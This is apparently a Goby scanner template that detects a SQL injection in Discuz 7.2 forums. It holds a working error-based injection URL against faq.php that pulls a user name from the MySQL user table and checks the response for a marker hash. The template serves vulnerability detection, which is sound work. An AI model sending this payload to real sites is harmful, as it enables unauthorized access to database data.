Goby/json/Discuz_v72_SQLI.json

69 lines
2.7 KiB
JSON

{
"Name": "Discuz v72 SQLI",
"Level": "2",
"Tags": [
"sqli"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "discuz7.2论坛存在sql注入漏洞",
"Product": "Discuz",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://blog.csdn.net/weixin_40709439/article/details/82780606"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 ",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "81dc9bdb52d04dc20036dbd8313ed055",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Discuz! info</b>: MySQL Query Error",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-11-16 17:48:16",
"GobyVersion": "1.8.302"
}